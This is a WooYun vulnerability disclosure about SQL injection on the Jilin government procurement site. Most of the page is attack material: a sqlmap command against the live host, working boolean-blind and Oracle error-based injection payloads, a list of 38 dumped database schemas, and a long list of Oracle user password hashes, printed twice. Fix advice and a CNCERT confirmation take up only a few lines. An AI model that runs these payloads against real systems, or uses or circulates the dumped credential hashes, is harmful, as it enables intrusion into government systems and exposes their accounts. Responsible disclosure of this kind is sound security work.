吉林政府采购网sql注射 | wooyun-2014-058750| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-058750

漏洞标题：吉林政府采购网sql注射

漏洞作者： F3K4

提交时间：2014-04-28 11:56

修复时间：2014-06-12 11:57

公开时间：2014-06-12 11:57

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-04-28：细节已通知厂商并且等待厂商处理中
2014-05-02：厂商已经确认，细节仅向厂商公开
2014-05-12：细节向核心白帽子及相关领域专家公开
2014-05-22：细节向普通白帽子公开
2014-06-01：细节向实习白帽子公开
2014-06-12：细节向公众公开

简要描述：

吉林政府采购网存在sql注射漏洞，同服务器下存在多站点使用同一cms，导致也可以SQL注射。

详细说明：

1.sql注射点

sqlmap -u "www.ccgp-jilin.gov.cn/cgzxdtdetail.jsp?tablename=cgnr&condition=176868&articleid=10000245009" -p "condition" -b -v 2
Place: GET
Parameter: condition
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tablename=cgnr&condition=176868' AND 3768=3768 AND 'qeIx'='qeIx&articleid=10000245009
    Vector: AND [INFERENCE]
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: tablename=cgnr&condition=176868' AND 6881=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(103)||CHR(117)||CHR(109)||CHR(113)||(SELECT (CASE WHEN (6881=6881) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(117)||CHR(116)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'AUjh'='AUjh&articleid=10000245009
    Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle

2.数据库库名

available databases [38]:
[*] AGENCY
[*] CMSAPP
[*] CPMS
[*] CTXSYS
[*] DBSNMP
[*] DF
[*] DMSYS
[*] EXFSYS
[*] EXPERT
[*] EXPERT_EPS
[*] EXPERT_EPS_TEST
[*] EXPERT_EPS_V2
[*] EXPERT_EPS_V3
[*] EXPERT_EPS_ZJ
[*] EXPERT_R1
[*] EXPERT_TEST
[*] MM
[*] OA
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PERFSTAT
[*] SERSUB
[*] SMS
[*] SSADMIN
[*] SUREKAM
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TRSWCM65
[*] TRSWCM65PLUG
[*] TSMSYS
[*] TURBOCMS
[*] U1
[*] WCM
[*] WMSYS
[*] XDB

3.数据库密码

database management system users password hashes:
[*] _NEXT_USER [1]:
    password hash: NULL
[*] AGENCY [1]:
    password hash: CCAABCF8343A8E86
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] AQ_ADMINISTRATOR_ROLE [1]:
    password hash: NULL
[*] AQ_USER_ROLE [1]:
    password hash: NULL
[*] AUTHENTICATEDUSER [1]:
    password hash: NULL
[*] CMSAPP [1]:
    password hash: E1BF2337B07F4456
[*] CONNECT [1]:
    password hash: NULL
[*] CPMS [1]:
    password hash: 44995D03948B3E9B
[*] CTXAPP [1]:
    password hash: NULL
[*] CTXSYS [1]:
    password hash: 71E687F036AD56E5
[*] DBA [1]:
    password hash: NULL
[*] DBSNMP [1]:
    password hash: 54598AC2DBEE30A0
[*] DBSPI [1]:
    password hash: AF10C4747F52706A
[*] DELETE_CATALOG_ROLE [1]:
    password hash: NULL
[*] DF [1]:
    password hash: E31EBE8B97155D1A
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
[*] DMSYS [1]:
    password hash: BFBA5A553FD9E28A
[*] EJBCLIENT [1]:
    password hash: NULL
[*] EXECUTE_CATALOG_ROLE [1]:
    password hash: NULL
[*] EXFSYS [1]:
    password hash: 66F4EF5650C20355
[*] EXP_FULL_DATABASE [1]:
    password hash: NULL
[*] EXPERT [1]:
    password hash: B3219F8DCD054435
[*] EXPERT_EPS [1]:
    password hash: BDB2EE89FA364892
[*] EXPERT_EPS_TEST [1]:
    password hash: 56060368E526D666
[*] EXPERT_EPS_V2 [1]:
    password hash: 2B6CC459F263B5D1
[*] EXPERT_EPS_V3 [1]:
    password hash: C5C1A2D7312A552E
[*] EXPERT_EPS_ZJ [1]:
    password hash: FEC8D7B2B9B35E54
[*] EXPERT_R1 [1]:
    password hash: 18A2B4CA64610A86
[*] EXPERT_TEST [1]:
    password hash: 4EC8F00290837F9A
[*] GATHER_SYSTEM_STATISTICS [1]:
    password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
    password hash: GLOBAL
[*] HS_ADMIN_ROLE [1]:
    password hash: NULL
[*] IMP_FULL_DATABASE [1]:
    password hash: NULL
[*] JAVA_ADMIN [1]:
    password hash: NULL
[*] JAVA_DEPLOY [1]:
    password hash: NULL
[*] JAVADEBUGPRIV [1]:
    password hash: NULL
[*] JAVAIDPRIV [1]:
    password hash: NULL
[*] JAVASYSPRIV [1]:
    password hash: NULL
[*] JAVAUSERPRIV [1]:
    password hash: NULL
[*] LOGSTDBY_ADMINISTRATOR [1]:
    password hash: NULL
[*] MDDATA [1]:
    password hash: DF02A496267DEE66
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
[*] MGMT_USER [1]:
    password hash: NULL
[*] MGMT_VIEW [1]:
    password hash: 28D49618FAED282F
[*] MM [1]:
    password hash: D8FA6AC673D38C52
[*] MONITORUSER [1]:
    password hash: CE9B2FAEA51AE0B1
[*] NAGIOS [1]:
    password hash: 51E5F2198A83522F
[*] OA [1]:
    password hash: 33B535DACAB22AEB
[*] OEM_ADVISOR [1]:
    password hash: NULL
[*] OEM_MONITOR [1]:
    password hash: NULL
[*] OLAP_DBA [1]:
    password hash: NULL
[*] OLAP_USER [1]:
    password hash: NULL
[*] OLAPSYS [1]:
    password hash: 3FB8EF9DB538647C
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
[*] PERFSTAT [1]:
    password hash: AC98877DE1297365
[*] PUBLIC [1]:
    password hash: NULL
[*] RECOVERY_CATALOG_OWNER [1]:
    password hash: NULL
[*] RESOURCE [1]:
    password hash: NULL
[*] SCHEDULER_ADMIN [1]:
    password hash: NULL
[*] SELECT_CATALOG_ROLE [1]:
    password hash: NULL
[*] SERSUB [1]:
    password hash: 2853F9311C483DE8
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
[*] SMS [1]:
    password hash: 23C574F5509AEC3A
[*] SSADMIN [1]:
    password hash: 8A5D94EA2449ACB4
[*] SUREKAM [1]:
    password hash: 2B304C0F3D5CB702
[*] SYS [1]:
    password hash: 70E22C23FECE2FA7
[*] SYSMAN [1]:
    password hash: 672A0C8EFE8F6F72
[*] SYSTEM [1]:
    password hash: 2D594E86F93B17A1
[*] TRSWCM65 [1]:
    password hash: EAA04A47E6357E1E
[*] TRSWCM65PLUG [1]:
    password hash: 4DC109070BDD2E01
[*] TSMSYS [1]:
    password hash: 3DF26A8B17D0F29F
[*] TTT [1]:
    password hash: 139847AF52F14D52
[*] TURBOCMS [1]:
    password hash: EEC9AD6A8D4F8011
[*] U1 [1]:
    password hash: 13C53D92E4E5B01E
[*] WCM [1]:
    password hash: 823FB932BA363E7D
[*] WM_ADMIN_ROLE [1]:
    password hash: NULL
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
[*] XDB [1]:
    password hash: 88D8364765FCE6AF
[*] XDBADMIN [1]:
    password hash: NULL
[*] XDBWEBSERVICES [1]:
    password hash: NULL
[*] ZJJGTEST [1]:
    password hash: 889C42D9E9AA268B

漏洞证明：

database management system users password hashes:
[*] _NEXT_USER [1]:
    password hash: NULL
[*] AGENCY [1]:
    password hash: CCAABCF8343A8E86
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] AQ_ADMINISTRATOR_ROLE [1]:
    password hash: NULL
[*] AQ_USER_ROLE [1]:
    password hash: NULL
[*] AUTHENTICATEDUSER [1]:
    password hash: NULL
[*] CMSAPP [1]:
    password hash: E1BF2337B07F4456
[*] CONNECT [1]:
    password hash: NULL
[*] CPMS [1]:
    password hash: 44995D03948B3E9B
[*] CTXAPP [1]:
    password hash: NULL
[*] CTXSYS [1]:
    password hash: 71E687F036AD56E5
[*] DBA [1]:
    password hash: NULL
[*] DBSNMP [1]:
    password hash: 54598AC2DBEE30A0
[*] DBSPI [1]:
    password hash: AF10C4747F52706A
[*] DELETE_CATALOG_ROLE [1]:
    password hash: NULL
[*] DF [1]:
    password hash: E31EBE8B97155D1A
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
[*] DMSYS [1]:
    password hash: BFBA5A553FD9E28A
[*] EJBCLIENT [1]:
    password hash: NULL
[*] EXECUTE_CATALOG_ROLE [1]:
    password hash: NULL
[*] EXFSYS [1]:
    password hash: 66F4EF5650C20355
[*] EXP_FULL_DATABASE [1]:
    password hash: NULL
[*] EXPERT [1]:
    password hash: B3219F8DCD054435
[*] EXPERT_EPS [1]:
    password hash: BDB2EE89FA364892
[*] EXPERT_EPS_TEST [1]:
    password hash: 56060368E526D666
[*] EXPERT_EPS_V2 [1]:
    password hash: 2B6CC459F263B5D1
[*] EXPERT_EPS_V3 [1]:
    password hash: C5C1A2D7312A552E
[*] EXPERT_EPS_ZJ [1]:
    password hash: FEC8D7B2B9B35E54
[*] EXPERT_R1 [1]:
    password hash: 18A2B4CA64610A86
[*] EXPERT_TEST [1]:
    password hash: 4EC8F00290837F9A
[*] GATHER_SYSTEM_STATISTICS [1]:
    password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
    password hash: GLOBAL
[*] HS_ADMIN_ROLE [1]:
    password hash: NULL
[*] IMP_FULL_DATABASE [1]:
    password hash: NULL
[*] JAVA_ADMIN [1]:
    password hash: NULL
[*] JAVA_DEPLOY [1]:
    password hash: NULL
[*] JAVADEBUGPRIV [1]:
    password hash: NULL
[*] JAVAIDPRIV [1]:
    password hash: NULL
[*] JAVASYSPRIV [1]:
    password hash: NULL
[*] JAVAUSERPRIV [1]:
    password hash: NULL
[*] LOGSTDBY_ADMINISTRATOR [1]:
    password hash: NULL
[*] MDDATA [1]:
    password hash: DF02A496267DEE66
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
[*] MGMT_USER [1]:
    password hash: NULL
[*] MGMT_VIEW [1]:
    password hash: 28D49618FAED282F
[*] MM [1]:
    password hash: D8FA6AC673D38C52
[*] MONITORUSER [1]:
    password hash: CE9B2FAEA51AE0B1
[*] NAGIOS [1]:
    password hash: 51E5F2198A83522F
[*] OA [1]:
    password hash: 33B535DACAB22AEB
[*] OEM_ADVISOR [1]:
    password hash: NULL
[*] OEM_MONITOR [1]:
    password hash: NULL
[*] OLAP_DBA [1]:
    password hash: NULL
[*] OLAP_USER [1]:
    password hash: NULL
[*] OLAPSYS [1]:
    password hash: 3FB8EF9DB538647C
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
[*] PERFSTAT [1]:
    password hash: AC98877DE1297365
[*] PUBLIC [1]:
    password hash: NULL
[*] RECOVERY_CATALOG_OWNER [1]:
    password hash: NULL
[*] RESOURCE [1]:
    password hash: NULL
[*] SCHEDULER_ADMIN [1]:
    password hash: NULL
[*] SELECT_CATALOG_ROLE [1]:
    password hash: NULL
[*] SERSUB [1]:
    password hash: 2853F9311C483DE8
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
[*] SMS [1]:
    password hash: 23C574F5509AEC3A
[*] SSADMIN [1]:
    password hash: 8A5D94EA2449ACB4
[*] SUREKAM [1]:
    password hash: 2B304C0F3D5CB702
[*] SYS [1]:
    password hash: 70E22C23FECE2FA7
[*] SYSMAN [1]:
    password hash: 672A0C8EFE8F6F72
[*] SYSTEM [1]:
    password hash: 2D594E86F93B17A1
[*] TRSWCM65 [1]:
    password hash: EAA04A47E6357E1E
[*] TRSWCM65PLUG [1]:
    password hash: 4DC109070BDD2E01
[*] TSMSYS [1]:
    password hash: 3DF26A8B17D0F29F
[*] TTT [1]:
    password hash: 139847AF52F14D52
[*] TURBOCMS [1]:
    password hash: EEC9AD6A8D4F8011
[*] U1 [1]:
    password hash: 13C53D92E4E5B01E
[*] WCM [1]:
    password hash: 823FB932BA363E7D
[*] WM_ADMIN_ROLE [1]:
    password hash: NULL
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
[*] XDB [1]:
    password hash: 88D8364765FCE6AF
[*] XDBADMIN [1]:
    password hash: NULL
[*] XDBWEBSERVICES [1]:
    password hash: NULL
[*] ZJJGTEST [1]:
    password hash: 889C42D9E9AA268B

修复方案：

1.修复注入点
2.假如已经没用此系统，关闭此服务

版权声明：转载请注明来源 F3K4@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2014-05-02 21:27

厂商回复：

CNVD确认并复现所述情况，转由CNCERT下发给吉林分中心处置，按信息泄露风险评分，rank 13

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-058750

漏洞标题：吉林政府采购网sql注射

相关厂商：吉林政府采购网

漏洞作者： F3K4

提交时间：2014-04-28 11:56

修复时间：2014-06-12 11:57

公开时间：2014-06-12 11:57

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 F3K4@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-058750

漏洞标题：吉林政府采购网sql注射

相关厂商：吉林政府采购网

漏洞作者： F3K4

提交时间：2014-04-28 11:56

修复时间：2014-06-12 11:57

公开时间：2014-06-12 11:57

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-058750"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 F3K4@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：